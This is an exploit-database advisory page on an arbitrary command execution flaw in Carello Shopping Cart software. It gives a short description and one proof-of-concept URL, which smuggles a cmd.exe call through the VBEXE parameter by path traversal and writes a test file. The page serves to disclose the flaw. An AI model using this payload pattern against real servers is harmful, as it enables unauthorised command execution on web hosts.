header-logo
Suggest Exploit
vendor:
Carello Shopping Cart Software
by:
7.5
CVSS
HIGH
Arbitrary Command Execution
CWE
Product Name: Carello Shopping Cart Software
Affected Version From:
Affected Version To:
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Arbitrary Command Execution in Carello Shopping Cart Software

A remote user can execute arbitrary commands on a host using Carello Shopping Cart software. By sending a specially crafted HTTP request, the inetinfo.exe process can consume all available system resources, causing it to refuse any new connections. If the HTTP request includes arbitrary code, it will be executed with the privileges of the web server.

Mitigation:

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2729/info

It is possible for a remote user to execute arbitrary commands on a host using Carello Shopping Cart software. A specially crafted HTTP request could cause inetinfo.exe to consume all available system resources, refusing any new connections. If arbitrary code is part of the HTTP request, it will be executed with the privileges of the web server.

http://foo.org/scripts/Carello/Carello.dllCARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe20/c20echo20test>c:\defcom.txt

Navigation

Suggest Exploit

Services By CQR

cqrsecured